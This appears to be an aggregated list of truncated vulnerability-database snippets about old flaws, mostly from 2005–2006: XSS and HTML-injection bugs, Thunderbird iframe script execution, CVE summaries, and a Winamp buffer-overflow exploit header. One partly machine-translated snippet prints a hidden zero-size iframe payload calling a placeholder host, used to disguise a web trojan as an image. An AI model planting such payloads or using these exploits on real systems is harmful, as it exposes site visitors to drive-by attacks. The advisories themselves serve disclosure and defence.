PHPSelect Submit-A-Link - HTML Injection

source: https://www.securityfocus.com/bid/17348/info Submit-A-Link is prone to an HTML-injection vulnerability. The script fails to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HTML and script code would be executed in the context of th...

link bank code execution and xss

——– summary software: Link Bank vendors website: http://daverave.64digits.com/index.php?page=linkbank versions: n/a class: remote status: unpatched exploit: available solution: not available discovered by: retard risk level: high ——– description Link Bank does not sanatise post sumbited to it...

Mozilla Thunderbird 1.5 - Multiple Remote Information Disclosure Vulnerabilities

source: https://www.securityfocus.com/bid/16881/info Mozilla Thunderbird is susceptible to multiple remote information-disclosure vulnerabilities. These issues are due to the application's failure to properly enforce the restriction for downloading remote content in email messages. These issues...

DEBIAN-CVE-2006-0884

The WYSIWYG rendering engine "rich mail" editor in Mozilla Thunderbird 1.0.7 and earlier allows user-assisted attackers to bypass javascript security settings and obtain sensitive information or cause a crash via an e-mail containing a javascript URI in the SRC attribute of an IFRAME tag, which i...

CVE-2006-0884

The WYSIWYG rendering engine "rich mail" editor in Mozilla Thunderbird 1.0.7 and earlier allows user-assisted attackers to bypass javascript security settings and obtain sensitive information or cause a crash via an e-mail containing a javascript URI in the SRC attribute of an IFRAME tag, which i...

Mozilla Thunderbird code execution

IFRAME SRC attribute allows javascript execution...

Mozilla Thunderbird : Remote Code Execution & Denial of Service

Mozilla Thunderbird : Remote Code Execution & Denial of Service //----- Advisory Program : Mozilla Thunderbird Homepage : http://www.mozilla.com/thunderbird/ Tested version : = 1.0.7 Found by : nono2357 at sysdream dot com This advisory : nono2357 at sysdream dot com Discovery date : 2006/01/28...

CVE-2005-3630

Fedora Directory Server before 10 allows remote attackers to obtain sensitive information, such as the password from adm.conf via an IFRAME element, probably involving an Apache httpd.conf configuration that orders "allow" directives before "deny" directives...

Mozilla (Multiple Products) - iFrame JavaScript Execution

Mozilla Multiple Products - iFrame JavaScript Execution source: https://www.securityfocus.com/bid/16770/info Multiple Mozilla products are prone to a script-execution vulnerability. The vulnerability presents itself when an attacker supplies a specially crafted email to a user containing maliciou...

Mozilla (Multiple Products) - iFrame JavaScript Execution

source: https://www.securityfocus.com/bid/16770/info Multiple Mozilla products are prone to a script-execution vulnerability. The vulnerability presents itself when an attacker supplies a specially crafted email to a user containing malicious script code in an IFRAME and the user tries to reply t...

Cross site scripting

Cross-site scripting XSS vulnerability in u2u.php in XMB Forums 1.9.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the username parameter, as demonstrated using a URL-encoded iframe tag...

CVE-2006-0779

Cross-site scripting XSS vulnerability in u2u.php in XMB Forums 1.9.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the username parameter, as demonstrated using a URL-encoded iframe tag...

CVE-2005-4720

Mozilla Firefox 1.0.7 and earlier on Linux allows remote attackers to cause a denial of service client crash via an IFRAME element with a large value of the WIDTH attribute, which triggers a problem related to representation of floating-point numbers, leading to an infinite loop of widget resizes...

CVE-2005-4720

Mozilla Firefox 1.0.7 and earlier on Linux allows remote attackers to cause a denial of service client crash via an IFRAME element with a large value of the WIDTH attribute, which triggers a problem related to representation of floating-point numbers, leading to an infinite loop of widget resizes...

Winamp 5.12 - '.pls' Remote Buffer Overflow (1)

/ Winamp 5.12 Remote Buffer Overflow Universal Exploit Zero-Day Bug discovered & exploit coded by ATmaCA Web: http://www.spyinstructors.com && http://www.atmacasoft.com E-Mail: [email protected] Credit to Kozan / / Tested with : Winamp 5.12 on Win XP Pro Sp2 / / Usage: Execute exploit, it will...

Winamp <= 5.12 (Crafted PLS) Remote Buffer Overflow Exploit (0-Day)

No description provided by source. / Winamp 5.12 Remote Buffer Overflow Universal Exploit Zero-Day Bug discovered & exploit coded by ATmaCA Web: http://www.spyinstructors.com && http://www.atmacasoft.com E-Mail: [email protected] Credit to Kozan / / Tested with : Winamp 5.12 on Win XP Pro Sp2 / ...

CVE-2006-0407

Cross-site scripting XSS vulnerability in post.php in AZ Bulletin Board AZbb 1.1.00 and earlier allows remote attackers to inject arbitrary web script or HTML via the 1 nickname parameter and 2 an iframe tag in the topic parameter. NOTE: the original disclosure specified the name parameter, but a...

CVE-2006-0407

CVE-2006-0407 affects AZ Bulletin Board (AZbb) 1.1.00 and earlier. The vulnerability is a cross-site scripting (XSS) flaw in post.php, exploitable via the nickname parameter and an iframe tag in the topic parameter, enabling injection of arbitrary HTML/JavaScript by an attacker. The description n...

Some of the so-called JPG or gif image web page Trojan horse-vulnerability warning-the black bar safety net

Some so-called gif images web Trojan Related web page often so make html body iframe src=http://x.x.x.x/1.htm width=0 height=0/iframe img src=http://y. y. y. y/images/logo. gif/img /body /html 把 上面 代码 保存 成 mm.htm and then put online. Of course, 如果你把这个mm.htm改名成mm.jpg, and then use another page to...

CVE-2006-0180

CaLogic Calendars 1.2.2 contains a cross-site scripting (XSS) vulnerability that allows remote attackers to inject arbitrary script/HTML via the Title field on the "Adding New Event" page, and possibly other vectors involving iframe tags. The affected component is the calendar input handling in C...